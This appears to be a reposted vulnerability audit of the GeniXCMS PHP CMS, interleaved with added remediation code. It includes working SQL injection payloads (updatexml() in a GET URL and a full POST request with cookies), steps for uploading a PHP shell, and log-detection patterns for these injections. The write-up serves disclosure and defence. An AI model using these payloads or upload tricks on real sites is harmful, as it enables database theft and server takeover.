GeniXCMS Audit Journey

After seeing Songkuo get a CVE, I wanted to try auditing too. These are all extremely simple bugs.

I found some unsafe methods that cause a lot of problems.

I hope this helps you.


Method issues

Db.class.php

In Db.class.php you can see that escape() itself is safe. It is used in insert/update etc., but it is not used in select.

    public static function escape($vars)
    {
        if (DB_DRIVER == 'mysql') {
            // mysql_escape_string() escapes quotes and backslashes, but it is
            // deprecated (removed in PHP 7) and ignores the connection charset.
            $vars = mysql_escape_string($vars);
        }
        // ... other drivers omitted here
        return $vars;
    }

This program generally uses Typo::cleanX to sanitize $_POST and $_GET values.

Typo.class.php

    public static function cleanX($c)
    {
        $val = self::strip_tags_content($c, '<script>', true);
        $val = htmlspecialchars(
            $val,
            ENT_QUOTES | ENT_HTML5,
            'utf-8'
        );
        return $val;
    }

It encodes HTML special characters (including quotes, because of ENT_QUOTES), but the backslash \ is not touched. So a backslash can be used to break out of a quoted SQL string.

See the PHP manual entry for htmlspecialchars (function.htmlspecialchars).

Issue 1

Tags.class.php

    public static function exist($tag)
    {
        $tag = Typo::cleanX($tag);
        $sql = "SELECT `name` FROM `cat` WHERE `name` = '{$tag}' OR `slug` = '{$tag}' AND `type` = 'tag'";
        $q = Db::result($sql);
        // echo Db::$num_rows;
        if (Db::$num_rows > 0) {
            return true;
        } else {
            return false;
        }
    }

If $tag = and updatexml(1,(select version()),1)#\ then the query becomes:

SELECT `name` FROM `cat` WHERE `name` = 'and updatexml(1,(select version()),1)#\' OR `slug` = 'and updatexml(1,(select version()),1)#\' AND `type` = 'tag'

The backslash escapes the closing quote, so the first string literal runs on until the opening quote of the second value; the second copy of the payload is then parsed as SQL, and its # comments out the remainder. MySQL effectively sees:

SELECT `name` FROM `cat` WHERE `name` = 'xx' and updatexml(1,(select version()),1);
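The following is an added example, not code from GeniXCMS. It repeats the htmlspecialchars() step of Typo::cleanX so the reader can see that quotes are encoded while a backslash passes through, and it rewrites Tags::exist() on PDO with bound parameters so the tag value can no longer change the structure of the statement. The $pdo connection, the function names cleanX_like/show_clean_gap/tagExists and the COUNT(*) form of the query are assumptions.

```php
<?php
// Added example, not GeniXCMS code. Two parts:
//  1. cleanX_like() repeats the htmlspecialchars() step of Typo::cleanX so the
//     reader can see that quotes are encoded while backslashes pass through.
//  2. tagExists() is a rewrite of Tags::exist() on PDO with bound parameters,
//     so the tag value can no longer change the structure of the statement.
// $pdo is an assumed open PDO connection to the GeniXCMS database.

function cleanX_like(string $c): string
{
    // strip_tags_content() from the page is left out; it does not affect \
    return htmlspecialchars($c, ENT_QUOTES | ENT_HTML5, 'utf-8');
}

// Shows the gap: the quote becomes an HTML entity but the trailing backslash
// survives, which is exactly what lets a value end in \ and eat the closing quote.
function show_clean_gap(): array
{
    return [
        'quote'     => cleanX_like("it's"),
        'backslash' => cleanX_like('value\\'),
    ];
}

// Hardened Tags::exist(). Parameters are bound, so escaping the value is no
// longer the query's defence. Two placeholders are used because native MySQL
// prepares do not allow the same named placeholder twice. The parentheses make
// the grouping explicit: in the original, AND binds tighter than OR, so the
// `type` = 'tag' condition applied only to the slug comparison (whether that
// was intended is not clear from the page).
function tagExists(PDO $pdo, string $tag): bool
{
    $sql = "SELECT COUNT(*) FROM `cat` WHERE (`name` = :name OR `slug` = :slug) AND `type` = 'tag'";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':name' => $tag, ':slug' => $tag]);
    return (int) $stmt->fetchColumn() > 0;
}

print_r(show_clean_gap());
// Usage with a real connection (native prepares, no client-side emulation):
// $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
// var_dump(tagExists($pdo, (string) ($_GET['tag'] ?? '')));
```

The point of the rewrite is that correctness no longer depends on cleanX() or escape() being applied on every path: the driver sends the value separately from the statement text, so neither quotes nor backslashes in it are interpreted.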

Issue 2

Db.class.php

    public static function insert($vars)
    {
        if (is_array($vars)) {
            $set = '';
            $k = '';
            foreach ($vars['key'] as $key => $val) {
                $val = self::escape($val);
                $set .= "'{$val}',";
                $k .= "`{$key}`,";
            }

            $set = substr($set, 0, -1);
            $k = substr($k, 0, -1);

            $sql = sprintf('INSERT INTO `%s` (%s) VALUES (%s) ', $vars['table'], $k, $set);
        } else {
            $sql = $vars;
        }
        if (DB_DRIVER == 'mysql') {
            mysql_query('SET CHARACTER SET utf8');
            $q = mysql_query($sql) or die(mysql_error());
            self::$last_id = mysql_insert_id();
        }
        // ... other drivers omitted here
    }

Here:

    if (is_array($vars)) {
        ...
    } else {
        $sql = $vars;
    }

When $vars is not an array, the string is used as the SQL statement as-is. This causes security problems, because $val = self::escape($val); is never executed on that path.

Example:

/inc/lib/Control/Backend/categories.control.php

    if (User::access(1)) {
        $data['sitetitle'] = CATEGORIES;
        switch (isset($_POST['addcat'])) {
            case true:
                // cleanup first
                $slug = Typo::slugify(Typo::cleanX($_POST['cat']));
                $cat = Typo::cleanX($_POST['cat']);

                if (!isset($_POST['token']) || !Token::isExist($_POST['token'])) {
                    // VALIDATE ALL
                    $alertDanger[] = TOKEN_NOT_EXIST;
                }
                if (!isset($_POST['cat']) || $_POST['cat'] == '') {
                    $alertDanger[] = CATEGORY_CANNOT_EMPTY;
                }
                if (isset($alertDanger)) {
                    $data['alertDanger'] = $alertDanger;
                } else {
                    $cat = Db::insert(
                        sprintf(
                            "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                            $cat,
                            $slug,
                            Typo::int($_POST['parent'])
                        )
                    );
                    //print_r($cat);
                    $data['alertSuccess'][] = MSG_CATEGORY_ADDED.' '.$_POST['cat'];
                }
                if (isset($_POST['token'])) {
                    Token::remove($_POST['token']);
                }
                break;

            default:
                break;
        }
    }

The security issue is here:

                $cat = Db::insert(
                    sprintf(
                        "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                        $cat,
                        $slug,
                        Typo::int($_POST['parent'])
                    )
                );

Of course, update also has this problem.
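As an added example that is not GeniXCMS code, here is one way to close the raw-string path: Db::insert() refuses anything but the array form, and the categories handler builds its row as an array so every value goes through escape(). The class name DbStrict, the stand-in escape() (addslashes instead of the driver's function), the column names assumed from the positional VALUES list on the page, and the fact that insert() returns the SQL string instead of executing it are all assumptions made for this example.

```php
<?php
// Added example, not GeniXCMS code. Two complementary changes:
//  1. insert() stops accepting a raw SQL string, so callers cannot bypass escape().
//  2. The category insert is built as an array, which routes every value
//     through escape() (the page's array branch does the same).
// insert() returns the SQL text so the example can be inspected without a DB.

class DbStrict
{
    // Stand-in for Db::escape(). Production code must use the driver's own
    // function on the open connection (e.g. mysqli_real_escape_string) so the
    // connection charset is honoured; addslashes() is only for this demo.
    public static function escape(string $v): string
    {
        return addslashes($v);
    }

    // Same construction as the page's array branch; the string branch is gone.
    public static function insert($vars): string
    {
        if (!is_array($vars) || empty($vars['table']) || empty($vars['key']) || !is_array($vars['key'])) {
            throw new InvalidArgumentException('insert() only accepts [table => ..., key => [...]]');
        }
        // Identifiers are developer-supplied, but enforce a safe shape anyway.
        if (!preg_match('/^[A-Za-z0-9_]+$/', $vars['table'])) {
            throw new InvalidArgumentException('invalid table name');
        }
        $cols = [];
        $vals = [];
        foreach ($vars['key'] as $col => $val) {
            if (!preg_match('/^[A-Za-z0-9_]+$/', (string) $col)) {
                throw new InvalidArgumentException('invalid column name');
            }
            $cols[] = "`{$col}`";
            $vals[] = "'" . self::escape((string) $val) . "'";
        }
        return sprintf('INSERT INTO `%s` (%s) VALUES (%s)', $vars['table'], implode(',', $cols), implode(',', $vals));
    }
}

// Rewritten category insert. Column names after `name`, `slug` and `type` are
// assumed from the positional VALUES list on the page; adjust to the real schema.
function buildCategoryInsert(string $cat, string $slug, int $parent): string
{
    return DbStrict::insert([
        'table' => 'cat',
        'key'   => [
            'name'        => $cat,
            'slug'        => $slug,
            'parent'      => $parent,
            'description' => '',
            'type'        => 'post',
        ],
    ]);
}

// A value ending in a backslash now reaches the statement with the backslash
// escaped, so it can no longer consume the closing quote.
echo buildCategoryInsert('x\\', 'x', 0), PHP_EOL;

// And the old call style is rejected outright:
try {
    DbStrict::insert("INSERT INTO `cat` VALUES (null, 'x', 'x', '0', '', 'post')");
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The same change applies to update(): once the string branch is gone, the only way to reach the database through the helper is the array form that escapes every value.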

[SQL injection]

  1. Issue 1:

    /inc/lib/Control/Backend/posts.control.php

    $data['post'] = Db::result("SELECT * FROM `posts` WHERE `id` = '{$_GET['id']}' ");

    exp1:

    http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=posts&act=edit&id=6' and updatexml(1,(select user()),1)%23&token=Pp52R3oD4wuLBVutgD9hMsMrp8alQD3bKmuf06AI0HZMzoMiRe3s18BUa4eIOqrMqj38Cp9aoQqWaw10
  2. Issue 2:

    /inc/mod/newsletter/options.php

    $usr = Db::result("SELECT * FROM `user` WHERE `group` = '{$_POST['recipient']}'");

    exp2:

    POST /code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter HTTP/1.1
    Host: lemon.love
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter
    Cookie: GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; USER_NAME_COOKIE=admin; SID_1=95aefa9c; GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; GeniXCMS-Installation=bscpujchn91pl57oj10af4vb45; GeniXCMS-vMIHkJPDSgZrrg3uywYO=48a5t0i0d7bqh4q3toepkckf37
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 193
    
    subject=aaa%40qq.com&recipient=a'+and+updatexml(1,(select+version()),1)%23&type=text&token=x972PTSsrW9U5tCdFGTuRpgsNewA0Ozm3UTaPsh9ixhA3R0O25cRE7FCK3xlyEttm4EUGJXfgb3cCs3H&sendmail=&message=aaa
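From the defender's side, the requests above leave a recognisable trace in web-server logs. The following is an added example, not part of the original post or of GeniXCMS: a small scanner that reads access-log lines and flags query-string parameters carrying the error-based MySQL functions used here. The log lines are constructed for this example (their URL shapes mirror the page's requests), and PATTERNS and scanAccessLog() are assumptions.

```php
<?php
// Added example, not GeniXCMS code: scans access-log lines for query-string
// parameters that carry error-based MySQL functions or a quote followed by a
// boolean operator, as in the requests above. Log lines are constructed.

const PATTERNS = [
    'error_based_function' => '/\b(updatexml|extractvalue)\s*\(/i',
    'quote_then_boolean'   => '/[\'"]\s*(and|or)\b/i',
];

// Constructed sample lines in common log format.
$sampleLog = [
    '10.0.0.5 - - [10/Jan/2017:10:00:01 +0800] "GET /gxadmin/index.php?page=posts&act=edit&id=6 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Jan/2017:10:00:07 +0800] "GET /gxadmin/index.php?page=posts&act=edit&id=6%27+and+updatexml(1,(select+user()),1)%23 HTTP/1.1" 200 4311',
    '10.0.0.9 - - [10/Jan/2017:10:00:12 +0800] "POST /gxadmin/index.php?page=mods&mod=newsletter HTTP/1.1" 200 2210',
];

// Returns one record per (line, parameter, pattern) match.
function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        if (!preg_match('/"(GET|POST) (\S+) HTTP\//', $line, $m)) {
            continue;
        }
        $query = parse_url($m[2], PHP_URL_QUERY);
        if (!is_string($query) || $query === '') {
            continue;
        }
        parse_str($query, $params); // URL-decodes %27, + and %23 for us
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue;
            }
            foreach (PATTERNS as $label => $re) {
                if (preg_match($re, $value)) {
                    $hits[] = [
                        'line'    => $n + 1,
                        'method'  => $m[1],
                        'param'   => $name,
                        'pattern' => $label,
                        'value'   => $value,
                    ];
                }
            }
        }
    }
    return $hits;
}

// Caveat: the newsletter injection travels in a POST body, which a standard
// access log does not record; for that request the scanner only sees the URL.
// Catching it needs request-body logging at the application or WAF layer.
foreach (scanAccessLog($sampleLog) as $hit) {
    printf("line %d %s param=%s (%s): %s\n",
        $hit['line'], $hit['method'], $hit['param'], $hit['pattern'], $hit['value']);
}
```

Running it over the constructed lines reports only the second request, twice (once per pattern); the first line is the legitimate edit request and the third carries its payload in the body, which is the limitation the comment points out. The patterns are deliberately narrow; they are a triage aid for an audit like this one, not a replacement for fixing the queries.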

Backend getshell

1. Windows
Upload 1.php. (with a trailing dot) in the media section, and you get a shell.

2. Generic
Theme installation: upload a zip file containing
\inc\themes\shell\1\1.php
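As an added example that is not part of the original post or GeniXCMS, here is a filename check for the media upload that closes the Windows trailing-dot case: Windows drops trailing dots and spaces when it creates a file, so the check normalises the name the same way before it decides on the extension. The allowlist ALLOWED_EXT and the function safeUploadName() are assumptions.

```php
<?php
// Added example, not GeniXCMS code: a filename check for the media upload.
// Windows strips trailing dots and spaces when creating a file, so "1.php."
// is stored as "1.php". Normalise the same way first, then apply an
// extension allowlist. ALLOWED_EXT and safeUploadName() are assumptions.

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

// Returns a sanitised name to store under, or null if the upload must be rejected.
function safeUploadName(string $original): ?string
{
    // Drop any directory part, whichever separator the client used.
    $name = basename(str_replace('\\', '/', $original));
    // Normalise exactly as Windows would before deciding on the extension.
    $name = rtrim($name, ". \t\r\n");
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $parts = explode('.', $name);
    if (count($parts) < 2) {
        return null; // no extension at all
    }
    $ext = strtolower(array_pop($parts));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Some Apache setups hand any ".php" segment to the PHP handler, so refuse
    // executable-looking segments anywhere in the name (e.g. "x.php.jpg").
    foreach ($parts as $segment) {
        if (preg_match('/^(php\d*|phtml|phar)$/i', $segment)) {
            return null;
        }
    }
    $base = preg_replace('/[^A-Za-z0-9_-]/', '_', implode('.', $parts));
    if ($base === '') {
        return null; // names like ".png" have no usable base
    }
    return $base . '.' . $ext;
}

// Constructed inputs: the page's trailing-dot case plus a few neighbours.
foreach (['1.php.', '1.php', 'photo.JPG', 'x.php.jpg', 'a.b.png', '../../evil.png'] as $n) {
    printf("%-16s => %s\n", $n, var_export(safeUploadName($n), true));
}
```

Even with this check in place, the upload directory should have script execution disabled at the web-server level, and stored names are best replaced with a random token so the client never chooses the on-disk name. The theme-zip path is a separate matter: a theme legitimately contains PHP, so that feature can only be restricted to fully trusted administrators.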

Reposted from: https://www.cnblogs.com/iamstudy/articles/6266268.html
